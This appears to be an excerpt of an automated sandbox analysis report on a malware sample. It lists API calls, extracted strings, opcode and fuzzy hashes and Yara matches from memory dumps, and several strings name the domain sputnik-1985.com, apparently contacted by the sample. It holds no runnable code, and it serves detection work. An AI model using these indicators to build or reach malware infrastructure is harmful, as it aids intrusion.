                                                                                                                                                                                                              • String ID: **34$3.*e$7$?296$Dzgy$F$pYFG$xueV
                                                                                                                                                                                                              • API String ID: 0-838960260
                                                                                                                                                                                                              • Opcode ID: 7b5a23d88bef89aa42c6c7e2d97bc4aa05bd0ce91f1722a88b522020c4ce9573
                                                                                                                                                                                                              • Instruction ID: 9fd603e2e2b6aa0c26cb5433d265e71d93f1beae47a811e198ea48cd575ad1f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b5a23d88bef89aa42c6c7e2d97bc4aa05bd0ce91f1722a88b522020c4ce9573
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33522770A083909FD721DF29C85076FBBE1AF86214F08866EF8E95B392D775C506CB52
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: **34$3.*e$7$?296$Dzgy$F$pYFG$xueV
                                                                                                                                                                                                              • API String ID: 0-838960260
                                                                                                                                                                                                              • Opcode ID: 5f74e5b6dec745a83609f22ca2f56a0a01d893ce6f5bbfe61ed5e923aa15f220
                                                                                                                                                                                                              • Instruction ID: 1b09ee46c68ef75e254a9f2069ecba62510ae7922447996fa3a0c18055597dab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f74e5b6dec745a83609f22ca2f56a0a01d893ce6f5bbfe61ed5e923aa15f220
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0523B785083809FD721CF2AC8507AF7BE1AF95314F088A6DE8E94B392D739C945CB56
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0247899B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 024789A5
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02478A89
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 02478B5C
                                                                                                                                                                                                                • Part of subcall function 0247B917: FreeLibrary.KERNEL32(02478CED), ref: 0247B91D
                                                                                                                                                                                                                • Part of subcall function 0247B917: FreeLibrary.KERNEL32 ref: 0247B93E
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02478D06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                              • String ID: iGr
                                                                                                                                                                                                              • API String ID: 3676751680-3172554082
                                                                                                                                                                                                              • Opcode ID: 11ce8ba3a4c19a5b35d693506ce6fb6d4eb679c5fc0eef1a5643f2739b34e622
                                                                                                                                                                                                              • Instruction ID: e05866eab949832b4608122dddc3602cdb32edbe7d74ad45c8d08c0c222f3f03
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11ce8ba3a4c19a5b35d693506ce6fb6d4eb679c5fc0eef1a5643f2739b34e622
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 319148B3F453144BC308AE69CD8536AF6C79BC4604F1EC63EA898DB794EAB8CC054685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "'5F$%"$-R.U$4208$5FOLF4208$F$].I6$ua9j
                                                                                                                                                                                                              • API String ID: 0-1935212999
                                                                                                                                                                                                              • Opcode ID: e356e79c5344eb0c6bcb0294a4d958d93ef7a2b7ef09bca86de0a9b0b0fc969b
                                                                                                                                                                                                              • Instruction ID: e13efc57bea804829f417fdb94320699de724f6c6c8d5742eca6e49cbdee89c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e356e79c5344eb0c6bcb0294a4d958d93ef7a2b7ef09bca86de0a9b0b0fc969b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DC1257190C3808BD318DF25C891AABBBE6EFD2314F14496DE1E18B391DB39D50ACB56
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: c(<$klm"
                                                                                                                                                                                                              • API String ID: 3664257935-3870397272
                                                                                                                                                                                                              • Opcode ID: f126ca1394039353768ddbb2a0bd44d5613ce6596ce99bbbe4db0699ca61497d
                                                                                                                                                                                                              • Instruction ID: dce89a20c12713c4db367485f7c518052c867d0cf7514b553c8a8f39cc8728bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f126ca1394039353768ddbb2a0bd44d5613ce6596ce99bbbe4db0699ca61497d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8823376A183509BE725AB64C98072FBBE2EBD6714F18892FE5C547391D3B1DC01CB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0043CCE0: LdrInitializeThunk.NTDLL(0043FCC8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043CD0E
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A396
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A40B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                              • String ID: c(<$klm"
                                                                                                                                                                                                              • API String ID: 764372645-3870397272
                                                                                                                                                                                                              • Opcode ID: c54e285572358bd89313a4c0e51078bbd4b6fa27cc39006ed57cb80208bafe1e
                                                                                                                                                                                                              • Instruction ID: 8852f5a1584a0137792711b757e7344c3d32d11c597e52e1262a824389947356
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c54e285572358bd89313a4c0e51078bbd4b6fa27cc39006ed57cb80208bafe1e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC826876709340ABD725CB20C9807ABBBE2EBD6714F18852EE5C547352D379DC818B8B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: %Z6H$M(V%$p;8=$PV$X^$\R
                                                                                                                                                                                                              • API String ID: 0-2985836343
                                                                                                                                                                                                              • Opcode ID: 12ef0418cdba3a95664b13f8bf3f10414aa0d138b8f648468d1cdeff6c3190f8
                                                                                                                                                                                                              • Instruction ID: d9a35c0def28b48a324d31e9828ef9e59a5d35539e87415f95941a3a94a46cba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12ef0418cdba3a95664b13f8bf3f10414aa0d138b8f648468d1cdeff6c3190f8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5325572A183108FD3108F29DC8176BB7E1FBC6314F99892EE5958B391E738D805CB86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: `
                                                                                                                                                                                                              • API String ID: 0-2679148245
                                                                                                                                                                                                              • Opcode ID: f20815b8bbc967e0d9116feff917ff8437694ae5196a9c6266201fae6c244416
                                                                                                                                                                                                              • Instruction ID: 67944b68661e0de65aaad7d5f64a7e046e44ae60d0c4bcde534d1e4f996f7b67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f20815b8bbc967e0d9116feff917ff8437694ae5196a9c6266201fae6c244416
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF332471A087808FDB14DF78C84439EBFE2AF56320F0986AED4A99B3D1D3758945CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: 45*$[<X2$sputnik-1985.com$zr
                                                                                                                                                                                                              • API String ID: 3861434553-549244510
                                                                                                                                                                                                              • Opcode ID: 40c9366bdb580e3b69f2d8fa9c82c0fd58d661167f3280c808446744d7ea9f78
                                                                                                                                                                                                              • Instruction ID: 5620c47c904fcbe37e6affbba7953f6bbd3d6917915e7b2aad577a67bfbd47e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40c9366bdb580e3b69f2d8fa9c82c0fd58d661167f3280c808446744d7ea9f78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7691B1B4618B82DFD3258F3AC590652BFE2BF973047198699C0E60BB51C379B416CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: 45*$[<X2$sputnik-1985.com$zr
                                                                                                                                                                                                              • API String ID: 3861434553-549244510
                                                                                                                                                                                                              • Opcode ID: 4f4e8b165103d5ba1f171091541273358e781cb43d23f3817e1c9ed712beb87d
                                                                                                                                                                                                              • Instruction ID: bf0152d001b9ea5b1149188af91f79688cde84231b275a4fbc08da8dc0278ec6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f4e8b165103d5ba1f171091541273358e781cb43d23f3817e1c9ed712beb87d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E91D2B05087829FD315CF7AC590612BFF1BF97300B198699C0D61BB96C379B81ACB99
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Qsl-$_
                                                                                                                                                                                                              • API String ID: 0-1600642271
                                                                                                                                                                                                              • Opcode ID: ec5924e09fc4d67174d26ce30b1d0df2b351461dec4f276fa379d049dea5689d
                                                                                                                                                                                                              • Instruction ID: 20ee3995e4d363dbe253048fe7eb1ce5114e80e2a53dd3e1d9f86f056f468a5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec5924e09fc4d67174d26ce30b1d0df2b351461dec4f276fa379d049dea5689d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89D16C72508312CBC314CF28C8916ABB7E2FFD8764F194A2DE4D5873A1EB789945CB46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U$jW}U$jW}U$klm"
                                                                                                                                                                                                              • API String ID: 0-3698230354
                                                                                                                                                                                                              • Opcode ID: d5a671fae79bd4573deda153c14516211366adf218943a13afc897b99cfd4215
                                                                                                                                                                                                              • Instruction ID: 8de21d82b951a7e2f0b41576c6d03bba5c1e8b5d4acbeb0e33ba802b5f3cc662
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5a671fae79bd4573deda153c14516211366adf218943a13afc897b99cfd4215
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA0255767083058BC718DE28CCA166BF7E3EBE4324F19853EE9959B391DB749C058B81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: BC$PC$RC$RC
• API String ID: 0-3968095935
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,FFFFFFFC,00000000,00000000,?), ref: 02488622
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID: Qsl-$_
• API String ID: 237503144-1600642271
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,00000000), ref: 004283A9
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,Function_000283AF,00000000), ref: 004283D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 6
• API String ID: 237503144-1604402223
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: $&&$1$5FOLF4208$_
• API String ID: 0-2588491210
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: $%$)$NM$wxV
• API String ID: 0-3516447337
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: $%$)$NM$wxV
• API String ID: 0-3516447337
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: D]+\$FOA$ZUA
• API String ID: 0-2438413873
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f$sppv$s@
• API String ID: 2994545307-19717636
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: $&&$1$_
• API String ID: 0-941065778
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: jW}U$jW}U$jW}U
• API String ID: 0-3254358678
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: jW}U$jW}U$jW}U
• API String ID: 0-3254358678
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: $%$IK$MO
• API String ID: 0-1999044475
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 024881E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID: %~
• API String ID: 237503144-513252899
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417F81
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: %~
• API String ID: 237503144-513252899
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: h
• API String ID: 3664257935-2439710439
                                                                                                                                                                                                              • Opcode ID: 7a638dbd4f6341260a0b343d18183f4dfcf6662349f5f3a65a3bc0c4632adb7f
                                                                                                                                                                                                              • Instruction ID: 194f1f986705d39e05067962d60306051df70e7ef43b4e70e723bd87ebf20ba1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a638dbd4f6341260a0b343d18183f4dfcf6662349f5f3a65a3bc0c4632adb7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4415672A0C3918FD3158F25C8A0B6BBFD2AFE6305F18586EE4D69B391D7348805CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: h
                                                                                                                                                                                                              • API String ID: 3664257935-2439710439
                                                                                                                                                                                                              • Opcode ID: 7b5117faaad9ab62abe7c7747b2807ffbbce372d955378fdbcd7e496c484446d
                                                                                                                                                                                                              • Instruction ID: b7ed13841b3ed3e3dae911fd69fbb5de791276912ac4813f0da7813bc9d33e52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b5117faaad9ab62abe7c7747b2807ffbbce372d955378fdbcd7e496c484446d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F417CB2A0C3918BD315DF259C9176BBFD2AFE6304F28481DE4D55B391D6388805CB97
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #Cp
                                                                                                                                                                                                              • API String ID: 0-1859763496
                                                                                                                                                                                                              • Opcode ID: 61a1fe6748ad5f59d2a0296a15b8624181594235dc00955c07ac8bdb611d6f56
                                                                                                                                                                                                              • Instruction ID: 9ed90cc73041a5fc56db56e855eaf03129557bb88218118140f49c72216ffa24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61a1fe6748ad5f59d2a0296a15b8624181594235dc00955c07ac8bdb611d6f56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37F29377B583154BC71CCE59DC9129AB3D2EBC4214F0EC93DE889D7305EA7CE90A8A85
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                              • Opcode ID: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction ID: a7907e3acbaa69f0af0303794999f41cf7316645c869c84caf6fb397bfa3860d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E47237716083819FD721CF18C980BABBBE1BF84314F44891EF9A98B391D775D958CB92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                              • Opcode ID: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction ID: b1525a476907180d25a47be565f680916eaa3fdda84d94db1dd46bc05e860da8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a3328ec173b2069c0ca1db5d6298dbd80a00f2a002b2f79e2d75f43c014662b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 147235716083419FD720CF28C880B9BBBE1BF98314F04892EF99997391D779D958CB96
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: f$sppv
                                                                                                                                                                                                              • API String ID: 0-3758886653
                                                                                                                                                                                                              • Opcode ID: 6bf2b024e7c37cb1c328ab3d0845dffd59fad0e260c428b5febaee876b6ae751
                                                                                                                                                                                                              • Instruction ID: f2edf99051e3b59447172e99341901819a371e05eaea960dc714b30c1113c734
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bf2b024e7c37cb1c328ab3d0845dffd59fad0e260c428b5febaee876b6ae751
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 222225726083418FD314CF29C89076FB7E2EBE9314F188A6EE9E597391D775E8058B42
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: sputnik-1985.com$~q
                                                                                                                                                                                                              • API String ID: 0-1915957273
                                                                                                                                                                                                              • Opcode ID: a8870b9a4f3b980b938fa48d5994c28d1c9e772060d2e1a27d454703c0a37853
